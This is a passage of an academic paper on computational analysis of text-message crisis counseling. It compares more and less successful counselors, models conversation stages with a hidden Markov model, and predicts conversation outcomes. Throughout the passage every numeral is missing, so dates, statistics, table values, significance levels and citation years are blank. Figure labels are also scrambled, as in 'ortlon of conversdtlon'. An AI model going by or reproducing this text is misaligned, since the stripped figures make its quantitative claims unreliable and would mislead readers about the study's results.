less successful counselors in how they conduct conversations. our findings suggest actionable strategies that are associated with successful counseling: transactions of the association for computational linguistics, vol. , pp. – , . action editor: lillian lee. submission batch: / ; revision batch: / ; / published / . c© association for computational linguistics. distributed under a cc-by . license. . adaptability (section ): measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. . dealing with ambiguity (section ): we de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. we learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. . creativity (section . ): we quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. . making progress (section ): we develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. . change in perspective (section ): we de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. we find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. we further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (section ). such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. the dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. related work our work relates to two lines of research: therapeutic discourse analysis & psycholinguis- tics. the field of conversation analysis was born in the s out of a suicide prevention center (sacks and jefferson, ; van dijk, ). since then conversation analysis has been applied to various clinical settings including psychotherapy (labov and fanshel, ). work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (pennebaker et al., ). previous work also found that there are linguistic cues as- sociated with depression (ramirez-esparza et al., ; campbell and pennebaker, ) as well as with suicude (pestian et al., ). these find- ings are consistent with beck’s cognitive model of depression ( ; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with pyszczynski and greenberg’s self-focus model of depression ( ; depressed persons engage in higher levels of self-focus than non-depressed per- sons). in this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. large-scale computational linguistics applied to conversations. large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (niederhoffer and pennebaker, ; danescu-niculescu-mizil, ) as well as expressions of social power and status (bramsen et al., ; danescu-niculescu- mizil et al., ). other studies have connected writing to measures of success in the context of re- quests (althoff et al., ), user retention (althoff and leskovec, ), novels (ashok et al., ), and scientific abstracts (guerini et al., ). prior http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (stolcke et al., ). unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- ical clusters, or stages. most approaches employ hidden markov model-like models (barzilay and lee, ; ritter et al., ; paul, ; yang et al., ) which are also used in this work to model progression through conversation stages. very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. howes et al. ( ) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. counseling datasets have also been used to predict the conversa- tion outcome (huang, ) but without modeling the within-conversation dynamics that are studied in this work. other work has explored how novel inter- faces based on topic models can support counselors during conversations (dinakar et al., a; b; ; chen, ). our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. dataset description in this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via sms messages. text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. counseling process. any person in distress can text the organization’s public number. incoming re- quests are put into a queue and an available coun- dataset statistics conversations , conversations with survey response , ( . %) messages . million messages with survey response , ( . %) counselors messages per conversation* . words per message* . table : basic dataset statistics. rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. we refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. after the conversation ends, the texter receives a follow-up question (“how are you feeling now? better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). in contrast to previous work that has used human judges to rate a caller’s crisis state (kalafat et al., ), we di- rectly obtain this feedback from the texter. further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). all crisis counselors receive extensive training and commit to weekly shifts for a full year. dataset statistics. our dataset contains coun- selors and . million messages in , conversa- tions between november and november (see table ). all system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. out of these conversations, we use the , , or . %, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. conversations span a variety of issues of different difficulties (see rows one and two of ta- ble ). approval to analyze the dataset was obtained from the stanford irb. defining counseling quality the primary goal of this paper is to study strategies that lead to conversations with positive outcomes. thus, we require a ground-truth notion of conver- sation quality. in principle, we could study individ- na depressed relationship self harm family suicide stress anxiety other success rate . . . . . . . . . frequency . . . . . . . . . frequency with more successful counselors . . . . . . . . . frequency with less successful counselors . . . . . . . . . table : frequencies and success rates for the nine most common conversation issues (na: not available). on average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. however, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. there are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): first, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). while each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. second, we assume that conversation qual- ity is noisy. even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. over time, however, the “true” quality of the counselor will become appar- ent. third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. more vs. less successful counselors. we split the counselors into two groups and then compare their behavior. out of the counselors with more than labeled conversations of at least messages each, we use the most successful counselors as “more successful” counselors and the bottom as “less successful” counselors. their average success rates are . - . % and . - . %, respectively. while the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- - - - - - portion of conversation (% of messages) a ve ra ge m es sa ge le ng th more successful counselors, positive conversations more successful counselors, negative conversations less successful counselors, positive conversations less successful counselors, negative conversations figure : differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). error bars in all plots corre- spond to bootstrapped % confidence intervals using the member bootstrapping technique from ren et al. ( ). sations. studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. for example, figure illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. initial analysis. before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: do counselors specialize in certain issues? and, do successful counselors appear suc- cessful only because they handle “easier” cases? to gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). we com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. thus, we conclude that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. however, we find that this is not the case. in par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in . % vs. . %, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously ( . vs. . ). further, we find that both groups face sim- ilar distributions of issues over time (see table ). we attribute the largest difference, “na” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. counselor adaptability in the remainder of the paper we focus on factors that mediate the outcome of a conversation. first, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. we investigate this question by looking for language differences between positive and neg- ative conversations. in particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. we capture the time dimension by breaking up each conversation into five even chunks of messages. then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first %, second %, etc.), we build a tf-idf vector of word occurrences to represent the language of counselors within this subset. we use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. we then measure the difference between the “posi- - - - - - ortlon of conversdtlon (% of pessdges) . . . . . . . . d ls td nc e be tw ee n po sl tlv e d nd n eg dt lv e co nv er sd tlo ns ore successful counselors less successful counselors figure : more successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. all differences between more successful and less successful counselors except for the - bucket were found to be statistically significant (p < . ; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. we also explored using jensen-shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. results. we find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (figure ). at the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. this increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. reacting to ambiguity observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the dif- ferences. in particular, domain experts have sug- gested that more successful counselors are better at handling ambiguity in the conversation (levitt and jacques, ). here, we use ambiguity to refer to the uncertainty of the situation and the texter’s ac- tual core issue resulting from insufficiently short or uncertain descriptions. does initial ambiguity of the situation negatively affect the conversation? how do more successful counselors deal with ambiguous sit- uations? [ , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . f ra ct io n o f p o si tiv e c o n v. more successful less successful figure : more ambiguous situations (length of situation setter) are less likely to result in positive conversations. ( , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . . |r e sp o n se | / |s itu a tio n s e tt e r| counselor quality more successful less successful figure : all counselors react to short, ambiguous mes- sages by writing more (relative to the texter message) but more successful counselors do it more than less success- ful counselors. ambiguity. throughout this section we measure ambiguity in the conversation as the shortness of the texter’s responses in number of words. while ambi- guity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from brysbaert et al. ( )), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish. . initial ambiguity and situation setter it is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the con- versation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). however, we can study nearly identi- cal beginnings of conversations where we can di- rectly compare how more successful and less suc- cessful counselors react given nearly identical situa- tions (the texter first sharing their reason for texting in). we identify the situation setter within each con- versation as the first long message by the texter (typ- ically a response to a “can you tell me more about what is going on?” question by the counselor). results. we find that ambiguity plays an important role in counseling conversations. figure shows that more ambiguous situations (shorter length of situation setter) are less likely to result in success- ful conversations (we obtain similar results when measuring concreteness (brysbaert et al., ) di- rectly). further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (figure ; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = ). how- ever, more successful counselors react more strongly to ambiguous situations than less successful coun- selors. . how to respond to ambiguity having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. we match situation setters by representing them through tf-idf vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space. we only con- sider situation setters that are part of a dense cluster with at least neighbors, allowing us to compare follow-up responses by the counselors ( / situation setters were part of one of such clus- ters). we also used distributed word embeddings (e.g., (mikolov et al., )) instead of tf-idf vec- tors but found the latter to produce better clusters. based on counselor training materials we hypoth- esize that more successful counselors • address ambiguity by writing more themselves, • use more check questions (statements that tell the conversation partner that you understand threshold manually set after qualitative analysis of matches from randomly chosen clusters. results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., euclidean). more s. less s. test % conversations successful . . *** #messages in conversation . . *** situation setter length (#tokens) . . *** c response length (#tokens) . . *** t response length (#tokens) . . *** % cosine sim. c resp. to context . . *** % cosine sim. t resp. to context . . – % c resp. w check question . . *** % c resp. w suicide check . . *** % c resp. w thanks . . *** % c resp. w hedges . . *** % c resp. w surprise . . – table : differences between more and less success- ful counselors (c; more s. and less s.) in responses to nearly identical situation setters (sec. . ) by the texter (t). last column contains significance levels of wilcoxon signed rank tests (*** p < . , – p > . ). them while avoiding the introduction of any opinion or advice (labov and fanshel, ); e.g.“that sounds like...”), • check for suicidal thoughts early (e.g., “want to die”), • thank the texter for showing the courage to talk to them (e.g., “appreciate”), • use more hedges (mitigating words used to lessen the impact of an utterance; e.g., “maybe”, “fairly”), • and that they are less likely to respond with sur- prise (e.g., “oh, this sounds really awful”). a set of regular expressions is used to detect each class of responses (similar to the examples above). results. we find several statistically significant dif- ferences in how counselors respond to nearly iden- tical situation setters (see table ). while situation setters tend to be slightly longer for more success- ful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in tf- idf space) compared to less successful counselors (but the texter’s response does not seem affected). we do find that more successful counselors use more check questions, check for suicide ideation more of- ten, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise. more successful less successful counselor quality # s im ila r co u n se lo r re a ct io n s conversation quality positive negative figure : more successful counselors use less com- mon/templated responses (after the texter first explains the situation). this suggests that they respond in a more creative way. there is no significant difference between positive and negative conversations. . response templates and creativity in section . , we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). while this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. we define a measure of how “templated” the counselors responses are by counting the number of similar responses in tf-idf space for the counselor reaction (c.f., section . ; again using a manually defined and validated threshold on cosine distance). figure shows that more successful counselors use less common/templated questions. this sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. this tailoring of responses requires more effort from the counselor, which is consistent with the results in figure that showed that more successful counselors put in more effort in composing longer messages as well. ensuring conversation progress after demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they move through these stages. we further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. . unsupervised conversation model counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. we employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. our conversation model is a message-level hid- den markov model (hmm). figure illustrates the basic model where hidden states of the hmm rep- resent conversation stages. unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (figure ). this causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. we train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. we ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. the unigram language models are defined over all words occurring more than times (over % of words in the dataset), with other words replaced by an unknown token. results. we explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. table shows the words most unique to each stage. the first and last stages consist of the basic introductions and wrap- ups common to all conversations. in stage , the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. in stage , the counselor and texter dis- cuss the problem, particularly in relation to the other s ck ws w ,i s s w ,i w ,i ws ws figure : our conversation model generates a particular conversation ck by first generating a sequence of hid- den states s , s , ... according to a markov model. each state si then generates a message as a bag of words wi, , wi, , ... according a unigram language model wsi . counselor turn texter turn stage c stage stage k c ck t t tk figure : allowed state transitions for the conversation model. counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order. people involved. in stage , the counselor and tex- ter discuss actionable strategies that could help the texter. this is a well-known part of crisis counselor training called “collaborative problem solving.” . analyzing counselor progression do counselors differ in how much time they spend at each stage? in order to explore how counselors progress through the stages, we use the viterbi al- gorithm to assign each conversation the most likely sequence of stages according to our conversation model. we then compute the average duration in messages of each stage for both more and less suc- cessful counselors. we control for the different distributions of positive and negative conversations among more successful and less successful coun- selors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between and messages long. results. we find that more successful counselors are quicker to move past the earlier stages, partic- stage interpretation top words for texter top words for counselor introductions hi, hello, name, listen, hey hi, name, hello, hey, brings problem introduction dating, moved, date, liked, ended gosh, terrible, hurtful, painful, ago problem exploration knows, worry, burden, teacher, group react, cares, considered, supportive, wants problem solving write, writing, music, reading, play hobbies, writing, activities, distract, music wrap up goodnight, bye, thank, thanks, appreciate goodnight, , anytime, luck, table : the top words for counselors and texters with greatest increase in likelihood of appearing in each stage. the model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown). stage . . . . . . . . . s ta ge d ur at io n (p er ce nt o f c on ve rs at io n) more successful counselors less successful counselors figure : more successful counselors are quicker to get to know texter and issue (stage ) and use more of their time in the “problem solving” phase (stage ). ularly stage , and spend more time in later stages, particularly stage (figure ). this suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the rea- sons they are more successful. . coordination and power differences one possible explanation for the more successful counselors’ ability to quickly move through the early stages is that they have more “power” in the conversation and can thus exert more control over the progression of the conversation. we explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other’s conversational styles. research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (danescu- niculescu-mizil et al., ). in our analysis, we use the “aggregated ” coordi- nation measure c(b, a) from danescu-niculescu- mizil ( ), which measures how much group b coordinates to group a (a higher number means more coordination). the measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. if someone tends to use a particular marker right after their con- versation partner uses that marker, it suggests they are coordinating to their partner. formally, let set s be a set of exchanges, each involving an initial utterance u by a ∈ a and a reply u by b ∈ b. then the coordination of b to a according to a linguistic marker m is: cm(b, a) = p(emu →u |e m u )−p(emu →u ) where emu is the event that utterance u exhibits m (i.e., contains a word from category m) and emu →u is the event that reply u to u exhibits m. the prob- abilities are estimated across all exchanges in s. to aggregate across different markers, we average the coordination values of cm(b, a) over all markers m to get a macro-average c(b, a). the coordination between groups b and a is then defined as the mean of the coordinations of all members of group b to- wards the group a. we use eight markers from danescu-niculescu- mizil ( ), which are considered to be processed by humans in a generally non-conscious fashion: ar- ticles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers. results. texters coordinate less than coun- selors, with texters having a coordination value of c(texter, counselor)= . compared to the counselor’s c(counselor, texter)= . , suggest- ing that the texters hold more “power” in the conversation. however, more successful counselors coordinate less than less successful ones (c(more succ. counselors, texter)= . vs. c(less succ. counselors, texter)= . ). all differ- ences are statistically significant (p < . ; mann- whitney u test). this suggests that more successful counselors act with more control over the conversa- tion, which could explain why they are quicker to make it through the initial conversation stages. facilitating perspective change thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. in this section, we show that perspective change in the texter over time is asso- ciated with a higher likelihood of conversation suc- cess. prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (campbell and pennebaker, ), and existing theories link depression to a negative view of the future (pyszczynski et al., ) and a self- focusing style (pyszczynski and greenberg, ). here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. fur- ther, we show that the counselor might be able to actively induce perspective change. time. texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see figure a; each plot shows the relative amount of words in the liwc past, present, and future categories (tausczik and pennebaker, )). we find that texters writing more about the future are more likely to feel better after the conversation. this suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. self. another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (pyszczynski and greenberg, ; campbell and pennebaker, ). we measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (i, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using liwc. fig- ure b shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (pyszczynski and greenberg, )). we hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“i really appreciate it.”) even if the texter does not actually feel better. sentiment. lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. we measure sentiment as the relative fraction of pos- itive words using the liwc posemo and negemo sentiment lexicons. the results in figure c show that texters always start out more negative (value be- low . ), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. however, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. we find that both curves increase significantly at the very end of the con- versation. again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. together with the result on talking about the fu- ture, these findings are consistent with the theory of pyszczynski et al. ( ) that depression is related to a negative view of the future. role of a counselor. given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. we investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. we measure this tendency using the same coordination measures as section . except that instead of using stylistic liwc markers (e.g., auxiliary verbs, quantifiers), we use the liwc markers relevant to the particular aspect of perspec- tive change (e.g., future, heshe, posemo). in all cases we find a statistically significant (p < . ; mann-whitney u-test) increase in the likelihood of the texter using a liwc marker if the counselor used it in the previous message (~ - % change). this link between perspective change and how the counselor conducts the conversation suggests that the coun- selor might be able to actively induce measurable perspective change in the texter. - - - - - ortion of fonversation (% of pessages) . . . . . . . . . . ) ut ur e re la tiv e fr eq ue nf y ositive fonversations egative fonversations - - - - - ortion of conversation (% of pessages) . . . . . . . . . . as t r el at iv e fr eq ue nc y ositive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . . . . . p re se nt r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . el f r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . p os ep o re la tiv e fr eq ue nc y positive conversations egative conversations a : past b: self c: sentiment a : present a : future figure : a: throughout the conversation there is a shift from talking about the past to future, where in positive conversations this shift is greater; b: texters that talk more about others more often feel better after the conversation; c: more positive sentiment by the texter throughout the conversation is associated with successful conversations. predicting counseling success in this section, we combine our quantitative insights into a prediction task. we show that the linguistic as- pects of crisis counseling explored in previous sec- tions have predictive power at the level of individ- ual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. specifically, we create a balanced dataset of positive and negative conversations more than messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. there are such negative conver- sations and and we randomly subsample the larger set of positive conversations. we train the model with batch gradient descent and use l regulariza- tion when n-gram features are present and l reg- ularization otherwise. we evaluate our model with -fold cross-validation and compare models using the area under the roc curve (auc). features. we include three aspects of counselor messages discussed in section : hedges, check questions, and the similarity between the counselor’s message and previous texter message. we add a measure of how much progress the counselor has made (section ) by computing the viterbi path of stages for the conversation (only for the first x%) with the hmm conversation model and then adding the duration of each stage (in #messages) as a fea- ture. additionally, we add average message length . . . . . . . . . percent of conversation seen by the model . . . . . . . . . r o c a re a un de r th e cu rv e sc or e full model n-gram features only figure : prediction accuracies vs. percent of the con- versation seen by the model (without texter features). and average sentiment per message using vader sentiment (hutto and gilbert, ). further, we add temporal dynamics to the model by adding fea- ture conjunctions with the stages hmm model. af- ter running the stages model over the x% of the con- versation available to the classifier, we add each fea- ture’s average value over each stage as additional features. lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features. because the focus of this work is on counseling strategies, we primar- ily experiment with models using only features from counselor messages. for completeness, we also re- port results for a model including texter features. prediction results. the model’s accuracy increases with x, and we show that the model is able to dis- features roc auc counselor unigrams only . counselor unigrams and bigrams only . none . + hedges . (+ . ) + check questions . (+ . ) + similarity to last message . (+ . ) + duration of each stage . (+ . ) + sentiment . (+ . ) + message length . (+ . ) + stages feature conjunction . (+ . ) + counselor unigrams and bigrams . (+ . ) + texter unigrams and bigrams . (+ . ) table : performance of nested models predicting con- versation outcome given the first % of the conversa- tion. in bold: full models with only counselor features and with additional texter features. tinguish positive and negative conversations after only seeing the first % of the conversation (see figure ). we attribute the significant increase in performance for x = (accuracy= . , auc= . ) to strong linguistic cues that appear as a conversation wraps up (e.g., “i’m glad you feel better.”). to avoid this issue, our detailed feature analysis is performed at x = . feature analysis. the model performance as fea- tures are incrementally added to the model is shown in table . all features improve model accuracy sig- nificantly (p < . ; paired bootstrap resampling test). adding n-gram features produces the largest boost in auc and significantly improves over a model just using n-gram features ( . vs. . auc). note that most features in the full model are based on word frequency counts that can be derived from n-grams which explains why a simple n-gram model already performs quite well. however, our model performs well with only a small set of lin- guistic features, demonstrating they provide a sub- stantial amount of the predictive power. the effec- tiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations. conclusion & future work knowledge about how to conduct a successful coun- seling conversation has been limited by the fact that studies have remained largely qualitative and small- scale. in this work, we presented a large-scale quan- titative study on the discourse of counseling con- versations. we developed a set of novel computa- tional discourse analysis methods suited for large- scale datasets and used them to discover actionable conversation strategies that are associated with bet- ter conversation outcomes. we hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. for ex- ample, our insights could help improve counselor training and give rise to real-time counseling qual- ity monitoring and answer suggestion support tools. acknowledgements. we thank bob filbin for fa- cilitating the research, cristian danescu-niculescu- mizil for many helpful discussions, and dan ju- rafsky, chris manning, justin cheng, peter clark, david hallac, caroline suen, yilun wang and the anonymous reviewers for their valuable feedback on the manuscript. this research has been sup- ported in part by nsf cns- , iis- , nih bd k, aro muri, darpa xdata, darpa simplex, stanford data science initiative, boe- ing, lightspeed, sap, and volkswagen. references tim althoff and jure leskovec. . donor retention in online crowdfunding communities: a case study of donorschoose.org. in www. tim althoff, cristian danescu-niculescu-mizil, and dan jurafsky. . how to ask for a favor: a case study on the success of altruistic requests. in icwsm. vikas ganjigunte ashok, song feng, and yejin choi. . success with style: using writing style to pre- dict the success of novels. in emnlp. regina barzilay and lillian lee. . catching the drift: probabilistic content models, with applications to generation and summarization. in hlt-naacl. aaron t. beck. . depression: clinical, experimen- tal, and theoretical aspects. university of pennsylva- nia press. philip bramsen, martha escobar-molano, ami patel, and rafael alonso. . extracting social power rela- tionships from natural language. in hlt-naacl. marc brysbaert, amy beth warriner, and victor kuper- man. . concreteness ratings for thousand generally known english word lemmas. behavior re- search methods, ( ). r. sherlock campbell and james w. pennebaker. . the secret life of pronouns: flexibility in writing style and physical health. psychological science, ( ). ge chen. . visualizations for mental health topic models. master’s thesis, mit. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in www. cristian danescu-niculescu-mizil. . a computa- tional approach to linguistic style coordination. ph.d. thesis, cornell university. karthik dinakar, allison j.b. chaney, henry lieberman, and david m. blei. a. real-time topic models for crisis counseling. in kdd dssg workshop. karthik dinakar, emily weinstein, henry lieberman, and robert selman. b. stacked generalization learning to analyze teenage distress. in icwsm. karthik dinakar, jackie chen, henry lieberman, ros- alind picard, and robert filbin. . mixed- initiative real-time topic modeling & visualization for crisis counseling. in acm iciui. marco guerini, alberto pepe, and bruno lepri. . do linguistic style and readability of scientific ab- stracts affect their virality? in icwsm. shane haberstroh, thelma duffey, marcheta evans, robert gee, and heather trepal. . the experi- ence of online counseling. journal of mental health counseling, ( ). christine howes, matthew purver, and rose mccabe. . linguistic indicators of severity and progress in online text-based therapy for depression. clpsych workshop at acl . rongyao huang. . language use in teenage crisis intervention and the immediate outcome: a machine automated analysis of large scale text data. master’s thesis, columbia university. c.j. hutto and eric gilbert. . vader: a parsimo- nious rule-based model for sentiment analysis of social media text. in icwsm. thomas r. insel. . assessing the economic costs of serious mental illness. the american journal of psychiatry, ( ). john kalafat, madelyn gould, jimmie lou harris mun- fakh, and marjorie kleinman. . an evaluation of crisis hotline outcomes part : nonsuicidal crisis callers. suicide and life-threatening behavior, ( ). william labov and david fanshel. . therapeutic discourse: psychotherapy as conversation. dana heller levitt and jodi d. jacques. . promot- ing tolerance for ambiguity in counselor training pro- grams. the journal of humanistic counseling, edu- cation and development, ( ). tomas mikolov, ilya sutskever, kai chen, greg cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in nips. national institute of mental health. . any mental illness (ami) among u.s. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. retrieved june , . kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interaction. jour- nal of language and social psychology, ( ). michael j. paul. . mixed membership markov models for unsupervised conversation modeling. in emnlp-conll. james w. pennebaker, matthias r. mehl, and kate g. niederhoffer. . psychological aspects of natural language use: our words, our selves. annual review of psychology, ( ). john p. pestian, pawel matykiewicz, michelle linn-gust, brett south, ozlem uzuner, jan wiebe, kevin b. co- hen, john hurdle, and christopher brew. . senti- ment analysis of suicide notes: a shared task. biomed- ical informatics insights, (suppl. ). 